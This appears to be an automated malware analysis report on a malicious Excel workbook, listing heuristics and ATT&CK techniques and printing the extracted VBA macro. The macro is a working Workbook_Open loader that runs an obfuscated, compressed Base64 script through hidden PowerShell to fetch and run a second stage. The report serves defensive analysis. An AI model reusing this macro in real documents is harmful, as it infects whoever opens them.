MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a Workbook_Open macro that executes a PowerShell command. This command is designed to download and execute a second-stage payload by decompressing a Base64 encoded string and invoking it. The PowerShell execution path is C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe.
Heuristics 5
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2243 bytes |
SHA-256: b40884b35b1dc6c859ec166fe6b043cbf254f168a7f7377cde925e233fa75a73 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim str As String
Dim exec As String
str = "nVPbbtswDH33VxCGgdqIbThpelmKAr0hW4EtK5piewjy4Chso1WWDI"
str = str + "lO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700ulLosSmMp9O"
str = str + "/RalS7vXSulB9NoaxmSgpwlBMDronP4VLTFVn4Ii1VuTpVyo"
str = str + "iw3VvFUElNsG6xbvEhOvpvnXOLOeHNgmG+1ala3mUMv5Tb1W"
str = str + "/a7U6j7p94ZOvHwPGlR7hKPs++oSAY146wSEdI6diIeyTXIo"
str = str + "STN85O53OLzg3zQqp6OhiwAFoOWBl7H8NbGc94U5fI4WPiSx"
str = str + "RvB15ZQ0YY1YbeiDLyApeeG63ZaLjTfddLu/uH6UE/7fYPdm"
str = str + "Lo8xfBdzAVJbpS6giCki83ObU2b7w91+1Sc1G1wNCf1YQ+p0"
str = str + "UcuOZAJr9GgXKJYVC+Inrg88wL6n/gm5xJYpNLtFyKxrjhou"
str = str + "z2mDPOos5eo1ZPsmlDuD4bequFVAghKySK/p4cwWPjpPPSah"
str = str + "0HD529uBv/udpDld85ZhsZjRFsvFtjWVEed9mLZF2EfrPqdF"
str = str + "iBzQWycbele+XoPdIZX9SFE56pKRv5kOu5woizku504wXEuT"
str = str + "wWSdM3SAosZmgv8FZqSdJoCAQko7xA8L9KvdvzIdH858pcID"
str = str + "ztDCstmkgHSZk7RwtbNQ06DmgwePHEsjio04+o72gRZ+vdLM"
str = str + "sY+lnkbZ1fV5pkgenTUJpyjHYpBbr0U27dIldNC01ZNxWEjP"
str = str + "v2/DimYbBOt2WPohh+ivD40bbr7etjxThYxw1kLydmTLmlZK"
str = str + "wQS0jGKIyew+F+P8s2IiexeNz8AA=="
exec = "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Command ""Invoke-"
exec = exec + "Expression $(New-Object IO.StreamReader ($(New-O"
exec = exec + "bject IO.Compression.DeflateStream ($(New-Object"
exec = exec + " IO.MemoryStream (,$([Convert]::FromBase64String"
exec = exec + "(\"" " & str & " \"" )))), [IO.Compression.Compr"
exec = exec + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
exec = exec + "I)).ReadToEnd();"""
Shell (exec)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 11776 bytes |
SHA-256: 779d30636efadc9e70322625e1fa2ccbbfc5f4652eb8992df0ec5c472e32a5b5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.